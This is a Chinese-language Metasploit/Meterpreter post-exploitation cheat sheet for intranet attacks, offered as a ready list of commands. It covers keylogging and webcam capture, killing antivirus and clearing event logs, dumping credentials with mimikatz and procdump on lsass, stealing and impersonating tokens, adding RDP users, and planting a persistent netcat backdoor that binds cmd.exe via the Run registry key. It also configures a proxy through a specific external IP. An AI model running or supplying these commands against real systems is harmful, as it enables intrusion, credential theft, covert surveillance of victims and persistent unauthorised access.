再熟悉不过的内网工具了

代理

  • msf6 > setg Proxies socks5:117.50.179.15:6666
  • msf6 > setg ReverseAllowProxy true

    数据库

  • apt-get install postgresql -y 安装
  • su postgresql 进入数据库
  • psql 连接psql
  • \password postgres 修改密码
  • \q 退出
  • exit 返回

    信息收集

    • uictl disable mouse #禁用鼠标
    • uictl enable mouse #开启鼠标
    • uictl disable keyboard #禁用键盘
    • keyscan_start #开始键盘记录
    • keyscan_dump #导出记录数据
    • keyscan_stop #结束键盘记录
    • webcam_list #查看摄像头
    • webcam_snap #通过摄像头拍照
    • webcam_stream #通过摄像头开启视频
    • search -f sercret.doc 全局搜这个文件
    • run killav 关闭杀软
    • run post/windows/gather/enum_applications #获取安装软件信息
    • run post/windows/gather/dumplinks #获取最近的文件操作
    • run post/windows/gather/enum_pathes #补丁信息
    • clearev #清理日志
    • run get_local_subnets #获取网段信息
    • run autoroute -s #手动添加网段信息
    • run getcountermeasure 查看防火墙信息

      用户权限

  • execute -H -i -f cmd.exe 创建一个隐藏的,交互的进程

  • mimikatz
    • load wiki 加载mimikatz
    • kiwi_cmd sekurlsa::logonpasswords / privilege::debug #常规抓密码
    • wifi_list_shared 查看连接的WiFi密码
    • reg save HKLM\SYSTEM SYSTEM reg save HKLM\SAM SAM lsadump::sam /sam:SAM /system:SYSTEM #注册表抓hash
    • procdump64.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit #procdump64+mimikatz获取密码,需要管理员权限
    • https://www.ascotbe.com/2020/04/14/Mimikatz/
    • wdigest 获取系统账户信息
    • kerberos 获取明文
    • msv 抓取加密的hash密码
  • migrate #将Meterpreter会话移植到指定pid值进程中
  • run post/windows/manage/migrate 自动迁移进程
  • run post/windows/gather/smart_hashdump #系统权限下哈希导出SAM密码
  • use exploit/windows/smb/psexec #哈希攻击
  • run post/mutil/recon/local_exploit_suggester #提权建议
  • use auxiliary/scanner/smb/smb_login #爆破smb
  • set SessionsCommunication Timeout 0 不主动关闭会话
  • 窃取令牌
    • steal_token 窃取
    • drop_token 丢弃
    • 这种方法如果不是SYSTEM权限的话是无法窃取SYSTEM权限的,只能窃取相关的权限
  • 假冒令牌

    • use incognito
    • help incognit
    • list_tokens -u #查看可以使用的token
    • impersonate_token ‘NT AUTHORITY\SYSTEM’ #假冒SYSTEM token
    • impersonate_token NT\ AUTHORITY\SYSTEM
    • execute -f cmd.exe -i –t #利用假冒的token执行cmd
    • rev2self #返回原始权限

      RDP和转发

    • portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

    • run autoroute -s 192.168.159.0/24 #添加到目标环境网络
    • run getgui -e #开启RDP
    • run getgui -u lltest2 -p 123456 #添加用户
    • run getgui -f 6661 –e #3389端口转发到6661
    • run post/windows/manage/enable_rdp #开启远程桌面
    • run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
    • run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

      后门

    • run persistence -X -i 5 -p 6661 -r 192.168.159.134 #-i 反向连接时长,-x设置开机启动

    • run metsvc –A #自动生成后门
    • NC注册表后门
    • upload nc.exe c:\windows\system32 #上传nc到目标主机
    • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run 枚举run下的key值
    • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’ #把nc连接cmd放在开机启动目录下,并且设置本地端口为444
    • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc #查看键值
    • netsh firewall add portopening TCP 444 “FireWall” ENABLE ALL #设置防火墙开放444端口,描述FireWall,需要在cmd下操作

      第三方联动

  • use exploit/windows/local/payload_inject #会话注入

  • set DisablePayloadHandler True #不设立新的监听